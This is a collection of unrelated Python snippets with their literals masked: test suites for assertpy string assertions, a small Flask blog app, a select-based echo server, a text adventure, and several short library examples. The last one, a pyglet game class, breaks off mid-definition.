<s> import sys <EOL> import os <EOL> import os . path as P <EOL> from fabric . api import * <EOL> sys . path . append ( P . abspath ( <EOL> P . join ( P . dirname ( __file__ ) , '<STR_LIT>' ) ) ) <EOL> import venv <EOL> local = venv . local <EOL> clean = venv . clean <EOL> init = venv . init <EOL> def test ( k = None ) : <EOL> """<STR_LIT>""" <EOL> venv . install ( '<STR_LIT>' ) <EOL> py_test = venv . get_script ( '<STR_LIT>' ) <EOL> test_script = P . join ( '<STR_LIT>' , '<STR_LIT:test>' , '<STR_LIT>' ) <EOL> if not P . exists ( '<STR_LIT>' ) : <EOL> os . mkdir ( '<STR_LIT>' ) <EOL> if k is not None : <EOL> args = "<STR_LIT>" + k <EOL> else : <EOL> args = "<STR_LIT>" <EOL> local ( <EOL> '<STR_LIT>' . format ( py_test , test_script , args ) , <EOL> capture = False ) <EOL> def tox ( ) : <EOL> """<STR_LIT>""" <EOL> if not P . exists ( '<STR_LIT>' ) : <EOL> os . mkdir ( '<STR_LIT>' ) <EOL> venv . tox ( ) </s>
from assertpy import assert_that, fail
import sys

# Py2/Py3 shim: under Python 3 there is no `unicode` builtin, so alias it
# to `str`; under Python 2 keep the builtin.
if sys.version_info[<NUM_LIT:0>] == <NUM_LIT:3>:
    unicode = str
else:
    unicode = unicode


class TestString(object):
    """Tests for assertpy's string assertions.

    Each "<name>_failure" test follows the same pattern: trigger the
    assertion, call fail() if it unexpectedly passed, and verify the
    raised exception's message text.
    """

    def test_is_length(self):
        assert_that('<STR_LIT:foo>').is_length(<NUM_LIT:3>)

    def test_is_length_failure(self):
        try:
            assert_that('<STR_LIT:foo>').is_length(<NUM_LIT:4>)
            fail('<STR_LIT>')
        except AssertionError as ex:
            assert_that(str(ex)).is_equal_to('<STR_LIT>')

    def test_contains(self):
        # contains() accepts one or several expected substrings.
        assert_that('<STR_LIT:foo>').contains('<STR_LIT:f>')
        assert_that('<STR_LIT:foo>').contains('<STR_LIT:o>')
        assert_that('<STR_LIT:foo>').contains('<STR_LIT>', '<STR_LIT:o>')
        assert_that('<STR_LIT>').contains('<STR_LIT:d>')
        assert_that('<STR_LIT>').contains('<STR_LIT>', '<STR_LIT:e>', '<STR_LIT:d>')

    def test_contains_single_item_failure(self):
        try:
            assert_that('<STR_LIT:foo>').contains('<STR_LIT:x>')
            fail('<STR_LIT>')
        except AssertionError as ex:
            assert_that(str(ex)).is_equal_to('<STR_LIT>')

    def test_contains_multi_item_failure(self):
        try:
            assert_that('<STR_LIT:foo>').contains('<STR_LIT:f>', '<STR_LIT:x>', '<STR_LIT:z>')
            fail('<STR_LIT>')
        except AssertionError as ex:
            assert_that(str(ex)).is_equal_to("<STR_LIT>")

    def test_contains_ignoring_case(self):
        assert_that('<STR_LIT:foo>').contains_ignoring_case('<STR_LIT:f>')
        assert_that('<STR_LIT:foo>').contains_ignoring_case('<STR_LIT:F>')
        assert_that('<STR_LIT:foo>').contains_ignoring_case('<STR_LIT>')
        assert_that('<STR_LIT:foo>').contains_ignoring_case('<STR_LIT:f>', '<STR_LIT:o>', '<STR_LIT:F>', '<STR_LIT:O>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>')

    def test_contains_ignoring_case_type_failure(self):
        # Non-string subject is rejected with a TypeError.
        try:
            assert_that(<NUM_LIT>).contains_ignoring_case('<STR_LIT:f>')
            fail('<STR_LIT>')
        except TypeError as ex:
            assert_that(str(ex)).is_equal_to('<STR_LIT>')

    # NOTE(review): "missinge" typo in this test name; kept to avoid churn.
    def test_contains_ignoring_case_missinge_item_failure(self):
        try:
            assert_that('<STR_LIT:foo>').contains_ignoring_case()
            fail('<STR_LIT>')
        except ValueError as ex:
            assert_that(str(ex)).is_equal_to('<STR_LIT>')

    def test_contains_ignoring_case_single_item_failure(self):
        try:
            assert_that('<STR_LIT:foo>').contains_ignoring_case('<STR_LIT:X>')
            fail('<STR_LIT>')
        except AssertionError as ex:
            assert_that(str(ex)).is_equal_to('<STR_LIT>')

    def test_contains_ignoring_case_single_item_type_failure(self):
        try:
            assert_that('<STR_LIT:foo>').contains_ignoring_case(<NUM_LIT:12>)
            fail('<STR_LIT>')
        except TypeError as ex:
            assert_that(str(ex)).is_equal_to('<STR_LIT>')

    def test_contains_ignoring_case_multi_item_failure(self):
        try:
            assert_that('<STR_LIT:foo>').contains_ignoring_case('<STR_LIT:F>', '<STR_LIT:X>', '<STR_LIT>')
            fail('<STR_LIT>')
        except AssertionError as ex:
            assert_that(str(ex)).is_equal_to("<STR_LIT>")

    def test_contains_ignoring_case_multi_item_type_failure(self):
        try:
            assert_that('<STR_LIT:foo>').contains_ignoring_case('<STR_LIT:F>', <NUM_LIT:12>)
            fail('<STR_LIT>')
        except TypeError as ex:
            assert_that(str(ex)).is_equal_to('<STR_LIT>')

    def test_does_not_contain(self):
        assert_that('<STR_LIT:foo>').does_not_contain('<STR_LIT:x>')
        assert_that('<STR_LIT:foo>').does_not_contain('<STR_LIT:x>', '<STR_LIT:y>')

    def test_does_not_contain_single_item_failure(self):
        try:
            assert_that('<STR_LIT:foo>').does_not_contain('<STR_LIT:f>')
            fail('<STR_LIT>')
        except AssertionError as ex:
            assert_that(str(ex)).is_equal_to('<STR_LIT>')

    def test_does_not_contain_list_item_failure(self):
        try:
            assert_that('<STR_LIT:foo>').does_not_contain('<STR_LIT:x>', '<STR_LIT:y>', '<STR_LIT:f>')
            fail('<STR_LIT>')
        except AssertionError as ex:
            assert_that(str(ex)).is_equal_to("<STR_LIT>")

    def test_is_empty(self):
        assert_that('<STR_LIT>').is_empty()

    def test_is_empty_failure(self):
        try:
            assert_that('<STR_LIT:foo>').is_empty()
            fail('<STR_LIT>')
        except AssertionError as ex:
            assert_that(str(ex)).is_equal_to('<STR_LIT>')

    def test_is_not_empty(self):
        assert_that('<STR_LIT:foo>').is_not_empty()

    def test_is_not_empty_failure(self):
        try:
            assert_that('<STR_LIT>').is_not_empty()
            fail('<STR_LIT>')
        except AssertionError as ex:
            assert_that(str(ex)).is_equal_to('<STR_LIT>')

    def test_is_equal_ignoring_case(self):
        assert_that('<STR_LIT>').is_equal_to_ignoring_case('<STR_LIT:foo>')
        assert_that('<STR_LIT:foo>').is_equal_to_ignoring_case('<STR_LIT>')
        assert_that('<STR_LIT>').is_equal_to_ignoring_case('<STR_LIT:foo>')

    def test_is_equal_ignoring_case_failure(self):
        try:
            assert_that('<STR_LIT:foo>').is_equal_to_ignoring_case('<STR_LIT:bar>')
            fail('<STR_LIT>')
        except AssertionError as ex:
            assert_that(str(ex)).is_equal_to('<STR_LIT>')

    def test_is_equal_ignoring_case_bad_value_type_failure(self):
        try:
            assert_that(<NUM_LIT>).is_equal_to_ignoring_case(<NUM_LIT:12>)
            fail('<STR_LIT>')
        except TypeError as ex:
            assert_that(str(ex)).is_equal_to('<STR_LIT>')

    def test_is_equal_ignoring_case_bad_arg_type_failure(self):
        try:
            assert_that('<STR_LIT>').is_equal_to_ignoring_case(<NUM_LIT:12>)
            fail('<STR_LIT>')
        except TypeError as ex:
            assert_that(str(ex)).is_equal_to('<STR_LIT>')

    def test_starts_with(self):
        assert_that('<STR_LIT>').starts_with('<STR_LIT:f>')
        assert_that('<STR_LIT>').starts_with('<STR_LIT>')
        assert_that('<STR_LIT>').starts_with('<STR_LIT>')

    def test_starts_with_failure(self):
        try:
            assert_that('<STR_LIT>').starts_with('<STR_LIT:bar>')
            fail('<STR_LIT>')
        except AssertionError as ex:
            assert_that(str(ex)).is_equal_to('<STR_LIT>')

    def test_starts_with_bad_value_type_failure(self):
        try:
            assert_that(<NUM_LIT>).starts_with(<NUM_LIT:12>)
            fail('<STR_LIT>')
        except TypeError as ex:
            assert_that(str(ex)).is_equal_to('<STR_LIT>')

    def test_starts_with_bad_arg_none_failure(self):
        try:
            assert_that('<STR_LIT>').starts_with(None)
            fail('<STR_LIT>')
        except TypeError as ex:
            assert_that(str(ex)).is_equal_to('<STR_LIT>')

    def test_starts_with_bad_arg_type_failure(self):
        try:
            assert_that('<STR_LIT>').starts_with(<NUM_LIT>)
            fail('<STR_LIT>')
        except TypeError as ex:
            assert_that(str(ex)).is_equal_to('<STR_LIT>')

    def test_starts_with_bad_arg_empty_failure(self):
        # An empty prefix argument is rejected with a ValueError.
        try:
            assert_that('<STR_LIT>').starts_with('<STR_LIT>')
            fail('<STR_LIT>')
        except ValueError as ex:
            assert_that(str(ex)).is_equal_to('<STR_LIT>')

    def test_ends_with(self):
        assert_that('<STR_LIT>').ends_with('<STR_LIT:d>')
        assert_that('<STR_LIT>').ends_with('<STR_LIT>')
        assert_that('<STR_LIT>').ends_with('<STR_LIT>')

    def test_ends_with_failure(self):
        try:
            assert_that('<STR_LIT>').ends_with('<STR_LIT:bar>')
            fail('<STR_LIT>')
        except AssertionError as ex:
            assert_that(str(ex)).is_equal_to('<STR_LIT>')

    def test_ends_with_bad_value_type_failure(self):
        try:
            assert_that(<NUM_LIT>).ends_with(<NUM_LIT:12>)
            fail('<STR_LIT>')
        except TypeError as ex:
            assert_that(str(ex)).is_equal_to('<STR_LIT>')

    def test_ends_with_bad_arg_none_failure(self):
        try:
            assert_that('<STR_LIT>').ends_with(None)
            fail('<STR_LIT>')
        except TypeError as ex:
            assert_that(str(ex)).is_equal_to('<STR_LIT>')

    def test_ends_with_bad_arg_type_failure(self):
        try:
            assert_that('<STR_LIT>').ends_with(<NUM_LIT>)
            fail('<STR_LIT>')
        except TypeError as ex:
            assert_that(str(ex)).is_equal_to('<STR_LIT>')

    def test_ends_with_bad_arg_empty_failure(self):
        try:
            assert_that('<STR_LIT>').ends_with('<STR_LIT>')
            fail('<STR_LIT>')
        except ValueError as ex:
            assert_that(str(ex)).is_equal_to('<STR_LIT>')

    def test_matches(self):
        # matches() checks the value against a regular expression.
        assert_that('<STR_LIT>').matches('<STR_LIT>')
        assert_that('<STR_LIT>').matches('<STR_LIT>')
        assert_that('<STR_LIT>').matches('<STR_LIT>')
        assert_that('<STR_LIT>').matches('<STR_LIT>')
        assert_that('<STR_LIT>').matches('<STR_LIT>')
        assert_that('<STR_LIT>').matches('<STR_LIT>')

    def test_matches_failure(self):
        try:
            assert_that('<STR_LIT>').matches('<STR_LIT>')
            fail('<STR_LIT>')
        except AssertionError as ex:
            assert_that(str(ex)).is_equal_to('<STR_LIT>')

    def test_matches_bad_value_type_failure(self):
        try:
            assert_that(<NUM_LIT>).matches(<NUM_LIT:12>)
            fail('<STR_LIT>')
        except TypeError as ex:
            assert_that(str(ex)).is_equal_to('<STR_LIT>')

    def test_matches_bad_arg_type_failure(self):
        try:
            assert_that('<STR_LIT>').matches(<NUM_LIT>)
            fail('<STR_LIT>')
        except TypeError as ex:
            assert_that(str(ex)).is_equal_to('<STR_LIT>')

    def test_matches_bad_arg_empty_failure(self):
        try:
            assert_that('<STR_LIT>').matches('<STR_LIT>')
            fail('<STR_LIT>')
        except ValueError as ex:
            assert_that(str(ex)).is_equal_to('<STR_LIT>')

    def test_does_not_match(self):
        assert_that('<STR_LIT>').does_not_match('<STR_LIT>')
        assert_that('<STR_LIT>').does_not_match('<STR_LIT>')
        assert_that('<STR_LIT>').does_not_match('<STR_LIT>')

    def test_does_not_match_failure(self):
        try:
            assert_that('<STR_LIT>').does_not_match('<STR_LIT>')
            fail('<STR_LIT>')
        except AssertionError as ex:
            assert_that(str(ex)).is_equal_to('<STR_LIT>')

    def test_does_not_match_bad_value_type_failure(self):
        try:
            assert_that(<NUM_LIT>).does_not_match(<NUM_LIT:12>)
            fail('<STR_LIT>')
        except TypeError as ex:
            assert_that(str(ex)).is_equal_to('<STR_LIT>')

    def test_does_not_match_bad_arg_type_failure(self):
        try:
            assert_that('<STR_LIT>').does_not_match(<NUM_LIT>)
            fail('<STR_LIT>')
        except TypeError as ex:
            assert_that(str(ex)).is_equal_to('<STR_LIT>')

    def test_does_not_match_bad_arg_empty_failure(self):
        try:
            assert_that('<STR_LIT>').does_not_match('<STR_LIT>')
            fail('<STR_LIT>')
        except ValueError as ex:
            assert_that(str(ex)).is_equal_to('<STR_LIT>')

    def test_is_alpha(self):
        assert_that('<STR_LIT:foo>').is_alpha()

    def test_is_alpha_digit_failure(self):
        try:
            assert_that('<STR_LIT>').is_alpha()
            fail('<STR_LIT>')
        except AssertionError as ex:
            assert_that(str(ex)).is_equal_to('<STR_LIT>')

    def test_is_alpha_space_failure(self):
        try:
            assert_that('<STR_LIT>').is_alpha()
            fail('<STR_LIT>')
        except AssertionError as ex:
            assert_that(str(ex)).is_equal_to('<STR_LIT>')

    def test_is_alpha_punctuation_failure(self):
        try:
            assert_that('<STR_LIT>').is_alpha()
            fail('<STR_LIT>')
        except AssertionError as ex:
            assert_that(str(ex)).is_equal_to('<STR_LIT>')

    def test_is_alpha_bad_value_type_failure(self):
        try:
            assert_that(<NUM_LIT>).is_alpha()
            fail('<STR_LIT>')
        except TypeError as ex:
            assert_that(str(ex)).is_equal_to('<STR_LIT>')

    def test_is_alpha_empty_value_failure(self):
        try:
            assert_that('<STR_LIT>').is_alpha()
            fail('<STR_LIT>')
        except ValueError as ex:
            assert_that(str(ex)).is_equal_to('<STR_LIT>')

    def test_is_digit(self):
        assert_that('<STR_LIT>').is_digit()

    def test_is_digit_alpha_failure(self):
        try:
            assert_that('<STR_LIT>').is_digit()
            fail('<STR_LIT>')
        except AssertionError as ex:
            assert_that(str(ex)).is_equal_to('<STR_LIT>')

    def test_is_digit_space_failure(self):
        try:
            assert_that('<STR_LIT>').is_digit()
            fail('<STR_LIT>')
        except AssertionError as ex:
            assert_that(str(ex)).is_equal_to('<STR_LIT>')

    def test_is_digit_punctuation_failure(self):
        try:
            assert_that('<STR_LIT>').is_digit()
            fail('<STR_LIT>')
        except AssertionError as ex:
            assert_that(str(ex)).is_equal_to('<STR_LIT>')

    def test_is_digit_bad_value_type_failure(self):
        try:
            assert_that(<NUM_LIT>).is_digit()
            fail('<STR_LIT>')
        except TypeError as ex:
            assert_that(str(ex)).is_equal_to('<STR_LIT>')

    def test_is_digit_empty_value_failure(self):
        try:
            assert_that('<STR_LIT>').is_digit()
            fail('<STR_LIT>')
        except ValueError as ex:
            assert_that(str(ex)).is_equal_to('<STR_LIT>')

    def test_is_lower(self):
        assert_that('<STR_LIT:foo>').is_lower()
        assert_that('<STR_LIT>').is_lower()
        assert_that('<STR_LIT>').is_lower()

    def test_is_lower_failure(self):
        try:
            assert_that('<STR_LIT>').is_lower()
            fail('<STR_LIT>')
        except AssertionError as ex:
            assert_that(str(ex)).is_equal_to('<STR_LIT>')

    def test_is_lower_bad_value_type_failure(self):
        try:
            assert_that(<NUM_LIT>).is_lower()
            fail('<STR_LIT>')
        except TypeError as ex:
            assert_that(str(ex)).is_equal_to('<STR_LIT>')

    def test_is_lower_empty_value_failure(self):
        try:
            assert_that('<STR_LIT>').is_lower()
            fail('<STR_LIT>')
        except ValueError as ex:
            assert_that(str(ex)).is_equal_to('<STR_LIT>')

    def test_is_upper(self):
        assert_that('<STR_LIT>').is_upper()
        assert_that('<STR_LIT>').is_upper()
        assert_that('<STR_LIT>').is_upper()

    def test_is_upper_failure(self):
        try:
            assert_that('<STR_LIT:foo>').is_upper()
            fail('<STR_LIT>')
        except AssertionError as ex:
            assert_that(str(ex)).is_equal_to('<STR_LIT>')

    def test_is_upper_bad_value_type_failure(self):
        try:
            assert_that(<NUM_LIT>).is_upper()
            fail('<STR_LIT>')
        except TypeError as ex:
            assert_that(str(ex)).is_equal_to('<STR_LIT>')

    def test_is_upper_empty_value_failure(self):
        try:
            assert_that('<STR_LIT>').is_upper()
            fail('<STR_LIT>')
        except ValueError as ex:
            assert_that(str(ex)).is_equal_to('<STR_LIT>')

    def test_is_unicode(self):
        # `unicode` resolves via the Py2/Py3 shim at the top of the module.
        assert_that(unicode('<STR_LIT>')).is_unicode()
        assert_that(unicode('<STR_LIT>')).is_unicode()
        assert_that(unicode('<STR_LIT>')).is_unicode()

    def test_is_unicode_failure(self):
        try:
            assert_that(<NUM_LIT>).is_unicode()
            fail('<STR_LIT>')
        except AssertionError as ex:
            assert_that(str(ex)).is_equal_to('<STR_LIT>')

    def test_chaining(self):
        # Every assertion returns the builder, so calls can be chained.
        assert_that('<STR_LIT:foo>').is_type_of(str).is_length(<NUM_LIT:3>).contains('<STR_LIT:f>').does_not_contain('<STR_LIT:x>')
        assert_that('<STR_LIT>').starts_with('<STR_LIT:f>').ends_with('<STR_LIT:d>').matches('<STR_LIT>').does_not_match('<STR_LIT>')
<s> import sys <EOL> import numpy <EOL> from threshold_finder import Threshold_Finder <EOL> class Average_Threshold_Finder ( object ) : <EOL> def get_average_noise_threshold ( self , file_with_samples , no_of_samples ) : <EOL> with open ( file_with_samples ) as f : <EOL> samples = [ line [ : - <NUM_LIT:1> ] for line in f ] <EOL> noise_spectra = [ ] <EOL> avg_noise_powers = [ ] <EOL> for i in range ( <NUM_LIT:0> , int ( no_of_samples ) , <NUM_LIT:4> ) : <EOL> chord = samples [ i ] <EOL> first = samples [ i + <NUM_LIT:1> ] <EOL> second = samples [ i + <NUM_LIT:2> ] <EOL> third = samples [ i + <NUM_LIT:3> ] <EOL> t_finder = Threshold_Finder ( chord , first , second , third ) <EOL> coefficients , residual , average_noise_power = t_finder . find_least_squares ( ) <EOL> noise = residual ** <NUM_LIT:2> <EOL> noise_spectra . append ( noise ) <EOL> avg_noise_powers . append ( average_noise_power ) <EOL> average_noise = numpy . mean ( noise_spectra ) <EOL> sd_noise = numpy . std ( noise_spectra ) <EOL> avg_power = numpy . mean ( avg_noise_powers ) <EOL> sd_power = numpy . std ( avg_noise_powers ) <EOL> return ( average_noise , sd_noise , avg_power , sd_power ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> file_with_samples = sys . argv [ <NUM_LIT:1> ] <EOL> no_of_samples = sys . argv [ <NUM_LIT:2> ] <EOL> threshold_finder = Average_Threshold_Finder ( ) <EOL> average_noise , sd_noise , avg_power , sd_power = threshold_finder . get_average_noise_threshold ( file_with_samples , no_of_samples ) <EOL> print average_noise <EOL> print sd_noise <EOL> print avg_power <EOL> print sd_power </s>
<s> import numpy as np <EOL> import matplotlib . pyplot as plt <EOL> from agnez import embedding2d , embedding2dplot , timeseries2d , timeseries2dplot <EOL> def test_embedding2d ( ) : <EOL> data = np . random . normal ( <NUM_LIT:0> , <NUM_LIT:1> , ( <NUM_LIT:5> , <NUM_LIT:8> ) ) <EOL> labels = np . arange ( <NUM_LIT:5> ) <EOL> ebd , mtd = embedding2d ( data ) <EOL> assert ebd . shape == ( <NUM_LIT:5> , <NUM_LIT:2> ) <EOL> fig , ax , sc , txts = embedding2dplot ( ebd , labels ) <EOL> assert isinstance ( fig , plt . Figure ) <EOL> def test_timesseries2d ( ) : <EOL> data = np . random . normal ( <NUM_LIT:0> , <NUM_LIT:1> , ( <NUM_LIT:3> , <NUM_LIT:5> , <NUM_LIT:8> ) ) <EOL> labels = np . arange ( <NUM_LIT:5> ) <EOL> ebd , mtd = timeseries2d ( data ) <EOL> assert ebd . shape == ( <NUM_LIT:3> , <NUM_LIT:5> , <NUM_LIT:2> ) <EOL> fig , ax , sc , txts = timeseries2dplot ( ebd , labels ) <EOL> assert isinstance ( fig , plt . Figure ) </s>
<s> from _simple_example import ffi <EOL> lib = ffi . dlopen ( None ) <EOL> lib . printf ( b"<STR_LIT>" , ffi . cast ( "<STR_LIT:int>" , <NUM_LIT:2> ) ) </s>
<s> from dnslib import * <EOL> q = DNSRecord ( q = DNSQuestion ( "<STR_LIT>" , QTYPE . ANY ) ) <EOL> a = q . reply ( ) <EOL> a . add_answer ( RR ( "<STR_LIT>" , QTYPE . A , rdata = A ( "<STR_LIT>" ) , ttl = <NUM_LIT> ) ) <EOL> print str ( DNSRecord . parse ( a . pack ( ) ) ) == str ( a ) <EOL> print a <EOL> a . add_answer ( RR ( "<STR_LIT>" , QTYPE . A , rdata = A ( "<STR_LIT>" ) ) ) <EOL> a . add_answer ( RR ( "<STR_LIT>" , QTYPE . AAAA , rdata = AAAA ( "<STR_LIT>" ) ) ) <EOL> print str ( DNSRecord . parse ( a . pack ( ) ) ) == str ( a ) <EOL> print a </s>
<s> from flask_table import Table , Col <EOL> class ItemTable ( Table ) : <EOL> name = Col ( '<STR_LIT:Name>' ) <EOL> description = Col ( '<STR_LIT>' ) <EOL> class Item ( object ) : <EOL> def __init__ ( self , name , description ) : <EOL> self . name = name <EOL> self . description = description <EOL> items = [ Item ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> Item ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> Item ( '<STR_LIT>' , '<STR_LIT>' ) ] <EOL> table = ItemTable ( items ) <EOL> print ( table . __html__ ( ) ) </s>
<s> from . account import * </s>
<s> from flask import Flask , request , session , g , redirect , url_for , abort , render_template , flash , jsonify <EOL> from flask . ext . sqlalchemy import SQLAlchemy <EOL> import os <EOL> basedir = os . path . abspath ( os . path . dirname ( __file__ ) ) <EOL> DATABASE = '<STR_LIT>' <EOL> DEBUG = True <EOL> SECRET_KEY = '<STR_LIT>' <EOL> USERNAME = '<STR_LIT>' <EOL> PASSWORD = '<STR_LIT>' <EOL> DATABASE_PATH = os . path . join ( basedir , DATABASE ) <EOL> SQLALCHEMY_DATABASE_URI = '<STR_LIT>' + DATABASE_PATH <EOL> app = Flask ( __name__ ) <EOL> app . config . from_object ( __name__ ) <EOL> db = SQLAlchemy ( app ) <EOL> import models <EOL> @ app . route ( '<STR_LIT:/>' ) <EOL> def index ( ) : <EOL> """<STR_LIT>""" <EOL> entries = db . session . query ( models . Flaskr ) <EOL> return render_template ( '<STR_LIT>' , entries = entries ) <EOL> @ app . route ( '<STR_LIT>' , methods = [ '<STR_LIT:POST>' ] ) <EOL> def add_entry ( ) : <EOL> """<STR_LIT>""" <EOL> if not session . get ( '<STR_LIT>' ) : <EOL> abort ( <NUM_LIT> ) <EOL> new_entry = models . Flaskr ( request . form [ '<STR_LIT:title>' ] , request . form [ '<STR_LIT:text>' ] ) <EOL> db . session . add ( new_entry ) <EOL> db . session . commit ( ) <EOL> flash ( '<STR_LIT>' ) <EOL> return redirect ( url_for ( '<STR_LIT:index>' ) ) <EOL> @ app . route ( '<STR_LIT>' , methods = [ '<STR_LIT:GET>' , '<STR_LIT:POST>' ] ) <EOL> def login ( ) : <EOL> """<STR_LIT>""" <EOL> error = None <EOL> if request . method == '<STR_LIT:POST>' : <EOL> if request . form [ '<STR_LIT:username>' ] != app . config [ '<STR_LIT>' ] : <EOL> error = '<STR_LIT>' <EOL> elif request . form [ '<STR_LIT:password>' ] != app . config [ '<STR_LIT>' ] : <EOL> error = '<STR_LIT>' <EOL> else : <EOL> session [ '<STR_LIT>' ] = True <EOL> flash ( '<STR_LIT>' ) <EOL> return redirect ( url_for ( '<STR_LIT:index>' ) ) <EOL> return render_template ( '<STR_LIT>' , error = error ) <EOL> @ app . 
route ( '<STR_LIT>' ) <EOL> def logout ( ) : <EOL> """<STR_LIT>""" <EOL> session . pop ( '<STR_LIT>' , None ) <EOL> flash ( '<STR_LIT>' ) <EOL> return redirect ( url_for ( '<STR_LIT:index>' ) ) <EOL> @ app . route ( '<STR_LIT>' , methods = [ '<STR_LIT:GET>' ] ) <EOL> def delete_entry ( post_id ) : <EOL> """<STR_LIT>""" <EOL> result = { '<STR_LIT:status>' : <NUM_LIT:0> , '<STR_LIT:message>' : '<STR_LIT>' } <EOL> try : <EOL> new_id = post_id <EOL> db . session . query ( models . Flaskr ) . filter_by ( post_id = new_id ) . delete ( ) <EOL> db . session . commit ( ) <EOL> result = { '<STR_LIT:status>' : <NUM_LIT:1> , '<STR_LIT:message>' : "<STR_LIT>" } <EOL> flash ( '<STR_LIT>' ) <EOL> except Exception as e : <EOL> result = { '<STR_LIT:status>' : <NUM_LIT:0> , '<STR_LIT:message>' : repr ( e ) } <EOL> return jsonify ( result ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> app . run ( ) </s>
<s> """<STR_LIT>""" <EOL> import hashlib <EOL> lorem = '''<STR_LIT>''' </s>
<s> print ( "<STR_LIT>" ) <EOL> print "<STR_LIT>" <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' ) </s>
<s> from sys import exit <EOL> def gold_room ( ) : <EOL> print "<STR_LIT>" <EOL> choice = raw_input ( "<STR_LIT>" ) <EOL> if "<STR_LIT:0>" in choice or "<STR_LIT:1>" in choice : <EOL> how_much = int ( choice ) <EOL> else : <EOL> dead ( "<STR_LIT>" ) <EOL> if how_much < <NUM_LIT:50> : <EOL> print "<STR_LIT>" <EOL> exit ( <NUM_LIT:0> ) <EOL> else : <EOL> dead ( "<STR_LIT>" ) <EOL> def bear_room ( ) : <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> bear_moved = False <EOL> while True : <EOL> choice = raw_input ( "<STR_LIT>" ) <EOL> if choice == "<STR_LIT>" : <EOL> dead ( "<STR_LIT>" ) <EOL> elif choice == "<STR_LIT>" and not bear_moved : <EOL> print "<STR_LIT>" <EOL> bear_moved = True <EOL> elif choice == "<STR_LIT>" and bear_moved : <EOL> dead ( "<STR_LIT>" ) <EOL> elif choice == "<STR_LIT>" and bear_moved : <EOL> gold_room ( ) <EOL> else : <EOL> print "<STR_LIT>" <EOL> def cthulhu_room ( ) : <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> choice = raw_input ( "<STR_LIT>" ) <EOL> if "<STR_LIT>" in choice : <EOL> start ( ) <EOL> elif "<STR_LIT>" in choice : <EOL> dead ( "<STR_LIT>" ) <EOL> else : <EOL> cthulhu_room ( ) <EOL> def dead ( why ) : <EOL> print why , "<STR_LIT>" <EOL> exit ( <NUM_LIT:0> ) <EOL> def start ( ) : <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> print "<STR_LIT>" <EOL> choice = raw_input ( "<STR_LIT>" ) <EOL> if choice == "<STR_LIT:left>" : <EOL> bear_room ( ) <EOL> elif choice == "<STR_LIT:right>" : <EOL> cthulhu_room ( ) <EOL> else : <EOL> dead ( "<STR_LIT>" ) <EOL> start ( ) </s>
import select
import socket
import sys
import Queue

# Non-blocking TCP echo server driven by select.select().
# (Python 2: both the Queue module name and the `print >> stream`
# syntax are Py2-only.)
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.setblocking(<NUM_LIT:0>)
server_address = ('<STR_LIT:localhost>', <NUM_LIT>)
print >> sys.stderr, '<STR_LIT>' % server_address
server.bind(server_address)
server.listen(<NUM_LIT:5>)

# Sockets to watch for readability / writability, and one outgoing
# message queue per connected client.
inputs = [server]
outputs = []
message_queues = {}

while inputs:
    print >> sys.stderr, '<STR_LIT>'
    # Timeout (seconds) so the loop can report when nothing is ready.
    timeout = <NUM_LIT:1>
    readable, writable, exceptional = select.select(inputs, outputs, inputs, timeout)
    if not (readable or writable or exceptional):
        # select() timed out with no activity at all.
        print >> sys.stderr, '<STR_LIT>'
        continue
    for s in readable:
        if s is server:
            # The listening socket is readable: a new client is connecting.
            connection, client_address = s.accept()
            print >> sys.stderr, '<STR_LIT>', client_address
            connection.setblocking(<NUM_LIT:0>)
            inputs.append(connection)
            message_queues[connection] = Queue.Queue()
        else:
            data = s.recv(<NUM_LIT>)
            if data:
                # Queue the data to be echoed back, and start watching
                # this socket for writability.
                print >> sys.stderr, '<STR_LIT>' % (data, s.getpeername())
                message_queues[s].put(data)
                if s not in outputs:
                    outputs.append(s)
            else:
                # An empty read means the client closed its end; drop it.
                # NOTE(review): `client_address` here still holds the
                # address from the most recent accept(), not necessarily
                # this socket's peer — looks like a logging bug; confirm
                # before relying on this message.
                print >> sys.stderr, '<STR_LIT>', client_address, '<STR_LIT>'
                if s in outputs:
                    outputs.remove(s)
                inputs.remove(s)
                s.close()
                del message_queues[s]
    for s in writable:
        try:
            next_msg = message_queues[s].get_nowait()
        except Queue.Empty:
            # Queue drained: stop watching this socket for writability.
            print >> sys.stderr, '<STR_LIT>', s.getpeername(), '<STR_LIT>'
            outputs.remove(s)
        else:
            print >> sys.stderr, '<STR_LIT>' % (next_msg, s.getpeername())
            s.send(next_msg)
    for s in exceptional:
        # Exceptional condition reported by select(): drop the client.
        print >> sys.stderr, '<STR_LIT>', s.getpeername()
        inputs.remove(s)
        if s in outputs:
            outputs.remove(s)
        s.close()
        del message_queues[s]
<s> from threading import Timer <EOL> def delayed ( seconds ) : <EOL> def decorator ( f ) : <EOL> def wrapper ( * args , ** kargs ) : <EOL> t = Timer ( seconds , f , args , kargs ) <EOL> t . start ( ) <EOL> return wrapper <EOL> return decorator <EOL> @ delayed ( <NUM_LIT:3> ) <EOL> def timer_print ( ) : <EOL> print "<STR_LIT>" <EOL> for i in range ( <NUM_LIT:3> ) : <EOL> timer_print ( ) </s>
<s> """<STR_LIT>""" <EOL> import os . path <EOL> for path in [ '<STR_LIT>' , '<STR_LIT:filename>' , '<STR_LIT>' , '<STR_LIT:/>' , '<STR_LIT>' ] : <EOL> print '<STR_LIT>' % path , os . path . splitext ( path ) </s>
import pyglet
import physicalobject, resources


class Bullet(physicalobject.PhysicalObject):
    """A short-lived projectile that self-destructs half a second after creation."""

    def __init__(self, *args, **kwargs):
        # All bullets share the same bullet image resource.
        super(Bullet, self).__init__(resources.bullet_image, *args, **kwargs)
        # Schedule die() to run once, 0.5 seconds from now.
        pyglet.clock.schedule_once(self.die, <NUM_LIT:0.5>)
        self.is_bullet = True  # lets other code distinguish bullets from objects

    def die(self, dt):
